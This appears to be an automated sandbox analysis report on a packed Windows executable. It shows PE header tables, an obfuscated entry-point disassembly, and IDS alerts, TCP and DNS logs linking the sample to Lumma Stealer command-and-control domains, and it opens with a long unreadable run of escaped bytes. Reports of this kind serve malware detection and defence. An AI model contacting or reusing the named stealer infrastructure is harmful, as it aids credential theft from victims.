\xb0\xcb\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe7\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xcb\xe7\xb0\xca\xe7\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xcb\xe6\xb0\xcb\xe7\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe7\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe7\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe7\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe7\xb0\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xaf\xca\xe6\xaf\xca\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe7\xaf\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xcb\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xaf\xca\xe7\xaf\xca\xe7\xaf\xca\xe6\xaf\xca\xe6\xaf\xcb\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xaf\xcb\xe6\xb0\xca\xe7\xaf\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xcb\xe7\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xb0\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe7\xaf\xca\xe6\xaf\xca\xe7\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe7\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xb0\xca\xe7\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xaf\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xb0\xcb\xe6\xaf\xcb\xe6\xb0\xcb\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe7\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xcb\xe6\xaf\xca\xe7\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe7\xaf\xca\xe6\xaf\xca\xe6\xb0\xcb\xe6\xaf\xcb\xe7\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xaf\xcb\xe6\xaf\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xaf\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xcb\xe6\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xb0\xca\xe6\xb0\xcb\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe7\xb0\xca\xe6\xb0\xcb\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xcb\xe7\xb0\xca\xe6\xb0\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xb0\xca\xe6\xaf\xca\xe6\xaf\xca\xe7\xaf\xcb\xe6\xb0\xca\xe6\xb0\xca\xe6\xb0\xca
                                                Version:3
                                                Thumbprint MD5:C52F4D30B83A70AF0470658DE69BF663
                                                Thumbprint SHA-1:9E54C11AE2FF492B3597DC10CEE5EBB837B3BFAC
                                                Thumbprint SHA-256:7F26021CC1AE0BA2A97162E2CA71CCE97C6A30A498EB321878EB7AC98A6CCECE
                                                Serial:66EA4ABB0FB7CE8C42D3CDE1769F1FEB
                                                Instruction
                                                push ebp
                                                pushfd
                                                mov ebp, 11260B80h
                                                call 00007F1A64E21244h
                                                jnle 00007F1A64E349F7h
                                                pushfd
                                                xchg eax, esi
                                                lodsd
                                                lds esi, fword ptr [edi+46h]
                                                loope 00007F1A64E34A5Ah
                                                sbb ecx, dword ptr [eax-39h]
                                                inc esp
                                                and al, 00h
                                                loopne 00007F1A64E349A8h
                                                xor cl, ch
                                                call 00007F1A64D95E37h
                                                inc ebp
                                                xor dl, al
                                                bts di, di
                                                call 00007F1A64E2922Ah
                                                in eax, 1Fh
                                                rcl dword ptr [eax-69BC8AEFh], cl
                                                mov cl, EEh
                                                xor dword ptr [edi], esi
                                                add eax, 1DC8DDCCh
                                                inc ebp
                                                add eax, esi
                                                cmc
                                                mov eax, 8AB8E7F3h
                                                jnle 00007F1A64E349BAh
                                                add ebx, edx
                                                mov al, DAh
                                                mov edi, 8F00769Eh
                                                call far 96D8h : CB007698h
                                                sbb al, B0h
                                                mov cl, 4Fh
                                                bound esi, dword ptr [ecx]
                                                pop esi
                                                arpl word ptr [edi+1A2F4369h], cx
                                                in al, dx
                                                sub dword ptr [edx], ebp
                                                shld dx, ax, cl
                                                call 00007F1A64D5A78Ah
                                                jmp 00007F1A64D98136h
                                                mov ecx, 2BB3C7B8h
                                                mov ecx, dword ptr [ecx+ebp-2BB3C7B8h]
                                                mov edi, E8B63391h
                                                imul di, di
                                                mov edi, dword ptr [ebp+04h]
                                                jc 00007F1A64C4873Bh
                                                mov eax, 942C2986h
                                                call 00007F1A64E06781h
                                                jmp 00007F1A64E2D0FEh
                                                not edx
                                                jmp 00007F1A64C422B7h
                                                test ebx, ebx
                                                lea esp, dword ptr [esp+04h]
                                                je 00007F1A64D46E83h
                                                mov eax, dword ptr [ebp+ebx*4+00h]
                                                call 00007F1A64C3669Ch
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x2e54fc0x8c.vmp$PH
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x38e0000x8940.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x24e0000x6e68.vmp$PH
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x38c0000x1a18.reloc
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x1400000x44.vmp$PH
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x35af20x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x370000x296b0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0x3a0000xa2540x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .vmp$PH0x450000xfa30b0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .vmp$PH0x1400000x2340x4004a3b4254d0505fb177a355c1e8b8c1ddFalse0.0634765625data0.34905982431271465IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .vmp$PH0x1410000x24ad800x24ae00f27a27a2bdedeb219de2e9f64e257088unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .reloc0x38c0000x1a180x1c000c51f8f87abe17c6a9c18e9ea241d13cFalse0.37583705357142855data5.725189163263045IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .rsrc0x38e0000x89400xe007476abb1f0dafc6e668fb56f2a6110b8False0.3247767857142857data3.5735703364825677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                AFX_DIALOG_LAYOUT0x38ed080x2data5.0
                                                AFX_DIALOG_LAYOUT0x38ed0c0x2data5.0
                                                RT_DIALOG0x38ed100x8edata0.08450704225352113
                                                RT_DIALOG0x38eda00x1eadata0.125
                                                RT_DIALOG0x38ef8c0x1bcempty0
                                                RT_STRING0x38f1480x44cempty0
                                                RT_STRING0x38f5940x422empty0
                                                RT_STRING0x38f9b80x45eempty0
                                                RT_STRING0x38fe180x426empty0
                                                RT_STRING0x3902400x3c2empty0
                                                RT_STRING0x3906040x2d6empty0
                                                RT_STRING0x3908dc0x62empty0
                                                RT_RCDATA0x3909400x6000emptyEnglishUnited States0
                                                RT_MESSAGETABLE0x38e3a40x74cMatlab v4 mat-file (little endian) T, text, rows 200, columns 225, imaginaryEnglishUnited States0.30085653104925053
                                                RT_MANIFEST0x38eaf00x216ASCII text, with CRLF line terminators0.5411985018726592
                                                DLLImport
                                                KERNEL32.dllExitProcess
                                                ole32.dllCoCreateInstance
                                                OLEAUT32.dllSysAllocString
                                                USER32.dllCloseClipboard
                                                GDI32.dllBitBlt
                                                KERNEL32.dllHeapAlloc, HeapFree, ExitProcess, GetModuleHandleA, LoadLibraryA, GetProcAddress
                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States
                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                03/22/24-13:54:05.472247TCP2051588ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI)49735443192.168.2.4172.67.147.173
                                                03/22/24-13:54:10.961651TCP2051588ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI)49739443192.168.2.4172.67.147.173
                                                03/22/24-13:54:02.814250UDP2051587ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (colorfulequalugliess .shop)5766753192.168.2.41.1.1.1
                                                03/22/24-13:54:03.114371TCP2051588ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI)49732443192.168.2.4172.67.147.173
                                                03/22/24-13:54:09.869399TCP2051588ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI)49738443192.168.2.4172.67.147.173
                                                03/22/24-13:54:02.910864UDP2051586ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (wisemassiveharmonious .shop)6399553192.168.2.41.1.1.1
                                                03/22/24-13:54:08.102502TCP2051588ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI)49737443192.168.2.4172.67.147.173
                                                03/22/24-13:54:03.862026TCP2051588ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI)49733443192.168.2.4172.67.147.173
                                                03/22/24-13:54:06.419545TCP2051588ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI)49736443192.168.2.4172.67.147.173
                                                03/22/24-13:54:04.720277TCP2051588ET TROJAN Observed Lumma Stealer Related Domain (relevantvoicelesskw .shop in TLS SNI)49734443192.168.2.4172.67.147.173
                                                03/22/24-13:54:03.009215UDP2051584ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (relevantvoicelesskw .shop)5144053192.168.2.41.1.1.1
                                                TimestampSource PortDest PortSource IPDest IP
                                                Mar 22, 2024 13:54:03.110776901 CET49732443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:03.110806942 CET44349732172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:03.110888958 CET49732443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:03.114371061 CET49732443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:03.114389896 CET44349732172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:03.308084011 CET44349732172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:03.308224916 CET49732443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:03.312488079 CET49732443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:03.312505960 CET44349732172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:03.312827110 CET44349732172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:03.353223085 CET49732443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:03.365398884 CET49732443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:03.365426064 CET49732443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:03.365523100 CET44349732172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:03.836723089 CET44349732172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:03.836770058 CET44349732172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:03.836796045 CET44349732172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:03.836817980 CET49732443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:03.836819887 CET44349732172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:03.836833000 CET44349732172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:03.836860895 CET49732443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:03.836874008 CET44349732172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:03.836932898 CET49732443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:03.836937904 CET44349732172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:03.836949110 CET44349732172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:03.837002039 CET49732443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:03.838841915 CET49732443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:03.838852882 CET44349732172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:03.838884115 CET49732443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:03.838888884 CET44349732172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:03.861594915 CET49733443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:03.861637115 CET44349733172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:03.861722946 CET49733443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:03.862025976 CET49733443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:03.862036943 CET44349733172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.046919107 CET44349733172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.046996117 CET49733443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:04.049755096 CET49733443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:04.049765110 CET44349733172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.050014019 CET44349733172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.051899910 CET49733443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:04.051924944 CET49733443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:04.051975012 CET44349733172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.530145884 CET44349733172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.530189991 CET44349733172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.530217886 CET44349733172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.530252934 CET49733443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:04.530277967 CET44349733172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.530314922 CET44349733172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.530329943 CET49733443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:04.530337095 CET44349733172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.530370951 CET44349733172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.530392885 CET49733443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:04.530400991 CET44349733172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.530428886 CET44349733172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.530441999 CET49733443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:04.530447960 CET44349733172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.530494928 CET49733443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:04.530499935 CET44349733172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.530844927 CET44349733172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.530880928 CET44349733172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.530889988 CET49733443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:04.530898094 CET44349733172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.530925035 CET44349733172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.530935049 CET49733443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:04.530941963 CET44349733172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.530982971 CET49733443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:04.530989885 CET44349733172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.531004906 CET44349733172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.531047106 CET49733443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:04.531548023 CET49733443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:04.531564951 CET44349733172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.531574011 CET49733443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:04.531579018 CET44349733172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.719826937 CET49734443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:04.719861031 CET44349734172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.719938993 CET49734443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:04.720277071 CET49734443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:04.720293999 CET44349734172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.907758951 CET44349734172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.907923937 CET49734443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:04.909526110 CET49734443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:04.909533024 CET44349734172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.909780979 CET44349734172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.911336899 CET49734443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:04.911494970 CET49734443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:04.911531925 CET44349734172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:04.911587954 CET49734443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:04.911600113 CET44349734172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:05.354271889 CET44349734172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:05.354338884 CET44349734172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:05.354410887 CET49734443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:05.354607105 CET49734443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:05.354623079 CET44349734172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:05.354640007 CET49734443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:05.354648113 CET44349734172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:05.471735001 CET49735443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:05.471767902 CET44349735172.67.147.173192.168.2.4
                                                Mar 22, 2024 13:54:05.471868038 CET49735443192.168.2.4172.67.147.173
                                                Mar 22, 2024 13:54:05.472246885 CET49735443192.168.2.4172.67.147.173
                                                TimestampSource PortDest PortSource IPDest IP
                                                Mar 22, 2024 13:54:02.814249992 CET5766753192.168.2.41.1.1.1
                                                Mar 22, 2024 13:54:02.906362057 CET53576671.1.1.1192.168.2.4
                                                Mar 22, 2024 13:54:02.910864115 CET6399553192.168.2.41.1.1.1
                                                Mar 22, 2024 13:54:03.004045010 CET53639951.1.1.1192.168.2.4
                                                Mar 22, 2024 13:54:03.009215117 CET5144053192.168.2.41.1.1.1
                                                Mar 22, 2024 13:54:03.104690075 CET53514401.1.1.1192.168.2.4
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Mar 22, 2024 13:54:02.814249992 CET192.168.2.41.1.1.10xcf02Standard query (0)colorfulequalugliess.shopA (IP address)IN (0x0001)false
                                                Mar 22, 2024 13:54:02.910864115 CET192.168.2.41.1.1.10xbc14Standard query (0)wisemassiveharmonious.shopA (IP address)IN (0x0001)false
                                                Mar 22, 2024 13:54:03.009215117 CET192.168.2.41.1.1.10x95acStandard query (0)relevantvoicelesskw.shopA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Mar 22, 2024 13:54:02.906362057 CET1.1.1.1192.168.2.40xcf02Name error (3)colorfulequalugliess.shopnonenoneA (IP address)IN (0x0001)false
                                                Mar 22, 2024 13:54:03.004045010 CET1.1.1.1192.168.2.40xbc14Name error (3)wisemassiveharmonious.shopnonenoneA (IP address)IN (0x0001)false
                                                Mar 22, 2024 13:54:03.104690075 CET1.1.1.1192.168.2.40x95acNo error (0)relevantvoicelesskw.shop172.67.147.173A (IP address)IN (0x0001)false
